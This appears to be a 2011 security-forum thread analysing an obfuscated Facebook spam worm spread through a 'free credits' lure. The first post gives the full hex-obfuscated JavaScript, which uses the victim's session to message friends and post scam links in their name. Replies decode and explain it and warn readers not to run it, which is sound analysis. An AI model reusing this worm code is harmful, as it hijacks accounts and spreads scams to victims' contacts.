What Does This Javascript Code Do?

[555]

I was surfing facebook and found this thing saying how to get 500 free FB credits, I figured it sounded funny so I looked at the source code but have no idea how to descript, or what it is saying on the last line, how do I decode it or what is this code doing?

var chatmessage = "Hey %firstname% have you heard about the facebook glitch you can get 500 facebook credits check it out. cvb.jrflinnaa.info/?40lyjl9";
  var postmessage = "%tf% %tf% %tf% %tf% %tf% %tf%\ndid you guys hear about the facebook glitch you can get 500 facebook credits ?check it out http://sdf.jrflinnaa.info/?zpzx6fb\n";
  var redirect = "http://jrflinna.info/final.php";
  var _0xb65c=["\x47\x45\x54","\x2F","\x6F\x70\x65\x6E","\x6F\x6E\x72\x65\x61\x64\x79\x73\x74\x61\x74\x65\x63\x68\x61\x6E\x67\x65","\x72\x65\x61\x64\x79\x53\x74\x61\x74\x65","\x73\x74\x61\x74\x75\x73","\x6D\x61\x74\x63\x68","\x63\x6F\x6F\x6B\x69\x65","\x40\x5B","\x69\x64","\x3A","\x6E\x61\x6D\x65","\x5D","","\x26","\x3D","\x72\x65\x73\x70\x6F\x6E\x73\x65\x54\x65\x78\x74","\x50\x4F\x53\x54","\x2F\x61\x6A\x61\x78\x2F\x63\x68\x61\x74\x2F\x62\x75\x64\x64\x79\x5F\x6C\x69\x73\x74\x2E\x70\x68\x70\x3F\x5F\x5F\x61\x3D\x31","\x43\x6F\x6E\x74\x65\x6E\x74\x2D\x54\x79\x70\x65","\x61\x70\x70\x6C\x69\x63\x61\x74\x69\x6F\x6E\x2F\x78\x2D\x77\x77\x77\x2D\x66\x6F\x72\x6D\x2D\x75\x72\x6C\x65\x6E\x63\x6F\x64\x65\x64","\x73\x65\x74\x52\x65\x71\x75\x65\x73\x74\x48\x65\x61\x64\x65\x72","\x73\x75\x62\x73\x74\x72","\x28","\x29","\x62\x75\x64\x64\x79\x5F\x6C\x69\x73\x74","\x70\x61\x79\x6C\x6F\x61\x64","\x6E\x6F\x77\x41\x76\x61\x69\x6C\x61\x62\x6C\x65\x4C\x69\x73\x74","\x72\x61\x6E\x64\x6F\x6D","\x66\x6C\x6F\x6F\x72","\x67\x65\x74\x54\x69\x6D\x65","\x2F\x61\x6A\x61\x78\x2F\x63\x68\x61\x74\x2F\x73\x65\x6E\x64\x2E\x70\x68\x70\x3F\x5F\x5F\x61\x3D\x31","\x70\x6F\x73\x74\x20\x72\x65\x74\x75\x72\x6E\x65\x64\x20","\x41\x73\x79\x6E\x63\x52\x65\x71\x75\x65\x73\x74","\x73\x65\x6E\x64","\x2F\x61\x6A\x61\x78\x2F\x62\x72\x6F\x77\x73\x65\x72\x2F\x66\x72\x69\x65\x6E\x64\x73\x2F\x3F\x75\x69\x64\x3D","\x26\x5F\x5F\x61\x3D\x31\x26\x5F\x5F\x64\x3D\x31","\x6C\x65\x6E\x67\x74\x68","\x72\x65\x70\x6C\x61\x63\x65","\x70\x75\x73\x68","\x73\x68\x69\x66\x74","\x68\x6F\x6D\x65","\x25\x74\x66","\x25","\x6D\x65\x73\x73\x61\x67\x65\x5F\x74\x65\x78\x74","\x6D\x65\x73\x73\x61\x67\x65","\x2F\x61\x6A\x61\x78\x2F\x75\x70\x64\x61\x74\x65\x73\x74\x61\x74\x75\x73\x2E\x70\x68\x70\x3F\x5F\x5F\x61\x3D\x31","\x2F\x6D\x6F\x62\x69\x6C\x65\x2F\x3F\x76\x3D\x70\x68\x6F\x74\x6F\x73","\x58\x2D\x52\x65\x71\x75\x65\x73\x74\x65\x64\x2D\x57\x69\x74\x68","\x58\x2D\x52\x65\x71\x75\x65\x73\x74\x65\x64","\x6D\x61\x74\x63\x68\x3A\x20"];x1= new XMLHttpRequest();x1[_0xb65c[2]](_0xb65c[0],_0xb65c[1]);x1[_0xb65c[3]]=function (){if(x1[_0xb65c[4]]==4&&x1[_0xb65c[5]]==200){var _0xc3adx1=document[_0xb65c[7]][_0xb65c[6]](/c_user=(\d+)/)[1];var _0xc3adx2=3;var _0xc3adx3=function (_0xc3adx4){if(_0xc3adx4){return _0xb65c[8]+_0xc3adx4[_0xb65c[9]]+_0xb65c[10]+_0xc3adx4[_0xb65c[11]]+_0xb65c[12];} ;return _0xb65c[13];} ;var _0xc3adx5=function (_0xc3adx4){if(_0xc3adx4){return _0xc3adx4[_0xb65c[11]];} ;return _0xb65c[13];} ;var _0xc3adx6=function (_0xc3adx4){out=_0xb65c[13];for(var _0xc3adx7 in _0xc3adx4){out+=(out?_0xb65c[14]:_0xb65c[13])+_0xc3adx7+((_0xc3adx4[_0xc3adx7]!==null)?_0xb65c[15]+encodeURIComponent(_0xc3adx4[_0xc3adx7]):_0xb65c[13]);} ;return out;} ;var _0xc3adx8=(z=x1[_0xb65c[16]])[_0xb65c[6]](/name=\\"composer_id\\" value=\\"([\d\w]+)\\"/i)[1];if(true){var _0xc3adx9= new XMLHttpRequest();_0xc3adx9[_0xb65c[2]](_0xb65c[17],_0xb65c[18]);_0xc3adx9[_0xb65c[21]](_0xb65c[19],_0xb65c[20]);_0xc3adx9[_0xb65c[3]]=function (){if(_0xc3adx9[_0xb65c[4]]==4&&_0xc3adx9[_0xb65c[5]]==200){var _0xc3adxa=_0xc3adx9[_0xb65c[16]][_0xb65c[22]](9);var _0xc3adxb=eval(_0xb65c[23]+_0xc3adxa+_0xb65c[24]);var _0xc3adxc=_0xc3adxb[_0xb65c[26]][_0xb65c[25]];for(var _0xc3adxd in _0xc3adxc[_0xb65c[27]]){var _0xc3adxe=Math[_0xb65c[29]](Math[_0xb65c[28]]());var _0xc3adxf=( new Date())[_0xb65c[30]]();var _0xc3adx10=chatmessage;x5= new XMLHttpRequest();x5[_0xb65c[2]](_0xb65c[17],_0xb65c[31]);if(true){x5[_0xb65c[3]]=function (){if(x5[_0xb65c[4]]==4&&x5[_0xb65c[5]]==200){alert(_0xb65c[32]+_0xc3adx9[_0xb65c[16]]);} ;} ;} ;x5[_0xb65c[34]](_0xc3adx6({msg_id:_0xc3adxe,client_time:_0xc3adxf,to:_0xc3adxd,msg_text:_0xc3adx10,post_form_id_source:_0xb65c[33]}));} ;} ;} ;_0xc3adx9[_0xb65c[34]](_0xc3adx6({user:_0xc3adx1,lsd:null,post_form_id_source:_0xb65c[33],popped_out:false,force_render:true}));} ;if(true){var _0xc3adx11= new XMLHttpRequest();_0xc3adx11[_0xb65c[2]](_0xb65c[0],_0xb65c[35]+_0xc3adx1+_0xb65c[36]);_0xc3adx11[_0xb65c[3]]=function (){if(_0xc3adx11[_0xb65c[4]]==4&&_0xc3adx11[_0xb65c[5]]==200){var _0xc3adx12=_0xc3adx11[_0xb65c[16]][_0xb65c[6]](/\/\d+#\d+#\d+#q\.jpg.*?\\u003c\\\/>/gi);var _0xc3adx10=[];for(var _0xc3adx13=0;_0xc3adx13<_0xc3adx12[_0xb65c[37]];_0xc3adx13++){var _0xc3adx14=_0xc3adx12[_0xc3adx13][_0xb65c[6]](/#\d+#/)[0][_0xb65c[38]](/#/g,_0xb65c[13]);var _0xc3adx15=_0xc3adx12[_0xc3adx13][_0xb65c[6]](/>[^>]+\\u003c\\\/>$/i)[0][_0xb65c[38]](/\\u003c\\\/>$/gim,_0xb65c[13])[_0xb65c[38]](/>/g,_0xb65c[13]);_0xc3adx10[_0xb65c[39]]({id:_0xc3adx14,name:_0xc3adx15});} ;var _0xc3adx16=[];while(_0xc3adx16[_0xb65c[37]]<_0xc3adx2&&_0xc3adx10[_0xb65c[37]]){var _0xc3adx17=Math[_0xb65c[29]](Math[_0xb65c[28]]()*_0xc3adx10[_0xb65c[37]]);_0xc3adx16[_0xb65c[39]](_0xc3adx10[_0xc3adx17]);var _0xc3adxf=_0xc3adx10[_0xb65c[40]]();if(_0xc3adx17){_0xc3adx10[_0xc3adx17]=_0xc3adxf;} ;} ;var _0xc3adx18={composer_id:_0xc3adx8,context:_0xb65c[41],fbx:_0xb65c[13],lsd:null,post_form_id_source:_0xb65c[33]};mt=postmessage;_0xc3adx10=postmessage;for(var _0xc3adx13=1;_0xc3adx13<=_0xc3adx2;_0xc3adx13++){mt=mt[_0xb65c[38]](_0xb65c[42]+_0xc3adx13+_0xb65c[43],_0xc3adx5(_0xc3adx16[_0xc3adx13-1]));_0xc3adx10=_0xc3adx10[_0xb65c[38]](_0xb65c[42]+_0xc3adx13+_0xb65c[43],_0xc3adx3(_0xc3adx16[_0xc3adx13-1]));} ;_0xc3adx18[_0xb65c[44]]=mt;_0xc3adx18[_0xb65c[45]]=_0xc3adx10;x6= new XMLHttpRequest();x6[_0xb65c[2]](_0xb65c[17],_0xb65c[46]);x6[_0xb65c[34]](_0xc3adx6(_0xc3adx18));} ;} ;_0xc3adx11[_0xb65c[34]](null);} ;if(true){x4= new XMLHttpRequest();x4[_0xb65c[2]](_0xb65c[0],_0xb65c[47]);x4[_0xb65c[21]](_0xb65c[48],null);x4[_0xb65c[21]](_0xb65c[49],null);x4[_0xb65c[3]]=function (){if(x4[_0xb65c[4]]==4&&x4[_0xb65c[5]]==200){m=x4[_0xb65c[16]][_0xb65c[6]](/<div class="EmailIframe"><iframe src="[^\"]+.*<div>.*<\/div>"/)[0];alert(_0xb65c[50]+m);} ;} ;x4[_0xb65c[34]](null);} ;} ;} ;x1[_0xb65c[34]](null);

what exactly is all the stuff like "\x3D","\x72\x65\x73\x70\x6F\x6E\x73\x65\x54\x65\x78"?

[buffy]

Its been compressed if you view it though chrome element viewer it should show you what it really does.

[digip]

All the \x69 stuff is obfuscated hex code, almost like shell code attacks to try and hide what it really says.

Looks like some XSS attack for Facebook. Don't paste the output it asks you to in the browser. There used to be an old hack to view peoples wall, pics etc, that used similar techniques, but this is definitely not good to run.

URL for the code I found at - http://sdf.jrflinnaa.info/e.js

Someone had tweeted about a new Facebook XSS attack the other day, I assume this is it. This also looks like it takes advantage of the recent Adobe Flash attack, which is patched in the recent Flash update.

Edited April 10, 2011 by digip

[555]

<br />All the \x69 stuff is obfuscated hex code, almost like shell code attacks to try and hide what it really says.<br /><br />Looks like some XSS attack for Facebook. Don't paste the output it asks you to in the browser. There used to be an old hack to view peoples wall, pics etc, that used similar techniques, but this is definitely not good to run. <br /><br />URL for the code I found at - <a href='http://sdf.jrflinnaa.info/e.js' class='bbc_url' title='External link' rel='nofollow external'>http://sdf.jrflinnaa.info/e.js</a><br /><br />Someone had tweeted about a new Facebook XSS attack the other day, I assume this is it. This also looks like it takes advantage of the recent Adobe Flash attack, which is patched in the recent Flash update.<br />

<br /><br /><br />

Yeah that was the link. How can I un-obfuscate it to view what it says? So it is shell code? How does the browser even reconginize the hex code if it is encrypted/obfuscated? how do I create my own code like that? lol sorry for the thousand questions.

[digip]

Hex in JavaScript will automatically get written to plain text when the script runs, but there are a number of ways to obfuscate the code. I'm not too great at obfuscating stuff, but usually you write the output to an alert to see the result instead of letting it run normally. I often put the output to a text box so if it has another script inside of a script, it doesn't run.

I wrote a little piece on this a few years ago, but something like the code you have above requires several pieces of the puzzle to get the output. By itself you would have to decode the hex manually or write something to dump it since its variables and not a function in itself you can dump output from. Some scripts call multiple pieces to encode other bits of the scripts making it harder to decode them since it isn't all in one function or url location. They could break the codes up into multiple scripts across several domains, which makes it even harder to block, since the malicious code isn't in one script but in many, making the individual parts look benign.

Here is an example of how to decode very basic scripts so you can get an idea: http://www.twistedpairrecords.com/blog/2009/04/02/debugging-spam-code/

The first long hex string is

GET/openonreadystatechangereadyStatestatusmatchcookie@[id:name]&=responseTextPOST/ajax/chat/buddy_list.php?__a=1Content-Typeapplication/x-www-form-urlencodedsetRequestHeadersubstr()buddy_listpayloadnowAvailableListrandomfloorgetTime/ajax/chat/send.php?__a=1post returned AsyncRequestsend/ajax/browser/friends/?uid=&__a=1&__d=1lengthreplacepushshifthome%tf%message_textmessage/ajax/updatestatus.php?__a=1/mobile/?v=photosX-Requested-WithX-Requestedmatch: 

Edited April 10, 2011 by digip

[digip]

Here is a simple example of a "hello world" but obfuscated with hex code.

<html>
<head>

<script type="text/javascript">
function poop(){

	document.write("\x3C\x73\x63\x72\x69\x70\x74\x3E\x64\x6F\x63\x75\x6D\x65\x6E\x74\x2E\x77\x72\x69\x74\x65\x28\x22\x68\x65\x6C\x6C\x6F\x20\x77\x6F\x72\x6C\x64\x22\x29\x3B\x3C\x2F\x73\x63\x72\x69\x70\x74\x3E");
	}


</script>

</head>
<body >
\x3C\x73\x63\x72\x69\x70\x74\x3E\x64\x6F\x63\x75\x6D\x65\x6E\x74\x2E\x77\x72\x69\x74\x65\x28\x22\x68\x65\x6C\x6C\x6F\x20\x77\x6F\x72\x6C\x64\x22\x29\x3B\x3C\x2F\x73\x63\x72\x69\x70\x74\x3E = <script>poop();</script>
</body>
</html>

[555]

humm.. so I used leetkey plugin to Hex encode the first part of the code and got this "5c 78 33 43 5c 78 37 33 5c 78 36 33 5c 78 37 32 5c 78 36 39 5c 78 37 30 5c 78 37 34 5c 78 33 45 5c 78 36 34 5c 78 36 46 5c 78 36 33 5c 78 37 35 5c 78 36 44 5c 78 36 35 5c " which looks like normal hex, useing asciitable.com will view the first hex.. which says "nothing for 5c which is the \ probuly, hex-#78=x, hex#33=3, hex#43=+, hex#5c again, hex#78=x. hex#37=7, hex#, I dunno I think I am way off LOL  I will read the link you provided, thanks. There's not any kind of like firefox plugin to auto encode and decode that stuff? I guess things I do not know about yet I find interesting.

btw:Checked out that link but got a virus/xss/whatever warning

Edited April 10, 2011 by 555

[digip]

humm.. so I used leetkey plugin to Hex encode the first part of the code and got this "5c 78 33 43 5c 78 37 33 5c 78 36 33 5c 78 37 32 5c 78 36 39 5c 78 37 30 5c 78 37 34 5c 78 33 45 5c 78 36 34 5c 78 36 46 5c 78 36 33 5c 78 37 35 5c 78 36 44 5c 78 36 35 5c " which looks like normal hex, useing asciitable.com will view the first hex.. which says "nothing for 5c which is the \ probuly, hex-#78=x, hex#33=3, hex#43=+, hex#5c again, hex#78=x. hex#37=7, hex#, I dunno I think I am way off LOL  I will read the link you provided, thanks. There's not any kind of like firefox plugin to auto encode and decode that stuff? I guess things I do not know about yet I find interesting.

btw:Checked out that link but got a virus/xss/whatever warning

For which link? The twistedpairrecords one? Thats my site. I can assure you, no exploit code, your anti-virus is just overactive and scanning for code and I have in the page, but not able to run natively since its just dumped to a text box. It must be looking at the plain text itself as executable code, or a heuristic scan, but complete false positive.

[bibbinut]

Came across this article whilst doing a search on net. Very interesting.

5 XSS Exploits You Should Know About

deadlytechnology.com

Edited April 11, 2011 by bibbinut

[Infiltrator]

Came across this JavaScript Obfuscator website.

http://www.javascriptobfuscator.com/

[konaboy]

Remove the \x, convert the " and , to their hex numbers 22 & 2C, you get:

47 45 54 22 2C 22 2F 22 2C 22 6F 70 65 6E 22 2C 22 6F 6E 72 65 61 64 79 73 74 61 74 65 63 68 61 6E 67 65 22 2C 22 72 65 61 64 79 53 74 61 74 65 22 2C 22 73 74 61 74 75 73 22 2C 22 6D 61 74 63 68 22 2C 22 63 6F 6F 6B 69 65 22 2C 22 40 5B 22 2C 22 69 64 22 2C 22 3A 22 2C 22 6E 61 6D 65 22 2C 22 5D 22 2C 22 22 2C 22 26 22 2C 22 3D 22 2C 22 72 65 73 70 6F 6E 73 65 54 65 78 74 22 2C 22 50 4F 53 54 22 2C 22 2F 61 6A 61 78 2F 63 68 61 74 2F 62 75 64 64 79 5F 6C 69 73 74 2E 70 68 70 3F 5F 5F 61 3D 31 22 2C 22 43 6F 6E 74 65 6E 74 2D 54 79 70 65 22 2C 22 61 70 70 6C 69 63 61 74 69 6F 6E 2F 78 2D 77 77 77 2D 66 6F 72 6D 2D 75 72 6C 65 6E 63 6F 64 65 64 22 2C 22 73 65 74 52 65 71 75 65 73 74 48 65 61 64 65 72 22 2C 22 73 75 62 73 74 72 22 2C 22 28 22 2C 22 29 22 2C 22 62 75 64 64 79 5F 6C 69 73 74 22 2C 22 70 61 79 6C 6F 61 64 22 2C 22 6E 6F 77 41 76 61 69 6C 61 62 6C 65 4C 69 73 74 22 2C 22 72 61 6E 64 6F 6D 22 2C 22 66 6C 6F 6F 72 22 2C 22 67 65 74 54 69 6D 65 22 2C 22 2F 61 6A 61 78 2F 63 68 61 74 2F 73 65 6E 64 2E 70 68 70 3F 5F 5F 61 3D 31 22 2C 22 70 6F 73 74 20 72 65 74 75 72 6E 65 64 20 22 2C 22 41 73 79 6E 63 52 65 71 75 65 73 74 22 2C 22 73 65 6E 64 22 2C 22 2F 61 6A 61 78 2F 62 72 6F 77 73 65 72 2F 66 72 69 65 6E 64 73 2F 3F 75 69 64 3D 22 2C 22 26 5F 5F 61 3D 31 26 5F 5F 64 3D 31 22 2C 22 6C 65 6E 67 74 68 22 2C 22 72 65 70 6C 61 63 65 22 2C 22 70 75 73 68 22 2C 22 73 68 69 66 74 22 2C 22 68 6F 6D 65 22 2C 22 25 74 66 22 2C 22 25 22 2C 22 6D 65 73 73 61 67 65 5F 74 65 78 74 22 2C 22 6D 65 73 73 61 67 65 22 2C 22 2F 61 6A 61 78 2F 75 70 64 61 74 65 73 74 61 74 75 73 2E 70 68 70 3F 5F 5F 61 3D 31 22 2C 22 2F 6D 6F 62 69 6C 65 2F 3F 76 3D 70 68 6F 74 6F 73 22 2C 22 58 2D 52 65 71 75 65 73 74 65 64 2D 57 69 74 68 22 2C 22 58 2D 52 65 71 75 65 73 74 65 64 22 2C 22 6D 61 74 63 68 3A 20 22

Using the Hex to ASCII converter ( http://www.yellowpipe.com/yis/tools/encrypter/index.php ) the above converts to:

GET","/","open","onreadystatechange","readyState","status","match","cookie","@[","id",":","name","]","","&","=","responseText","POST","/ajax/chat/buddy_list.php?__a=1","Content-Type","application/x-www-form-urlencoded","setRequestHeader","substr","(",")","buddy_list","payload","nowAvailableList","random","floor","getTime","/ajax/chat/send.php?__a=1","post returned ","AsyncRequest","send","/ajax/browser/friends/?uid=","&__a=1&__d=1","length","replace","push","shift","home","%tf","%","message_text","message","/ajax/updatestatus.php?__a=1","/mobile/?v=photos","X-Requested-With","X-Requested","match:],

From there, I searched Google, and found this page, which appears to have the entire code (The above is at line 24):

http://pastebin.com/tY6wqti2

[i8igmac]

http://www.microsoft.com/technet/security/bulletin/MS10-090.mspx

Check out the metasploit module Ms10-09

This one is extremely popular right now

Look at the exploit source code.

Edited August 17, 2011 by i8igmac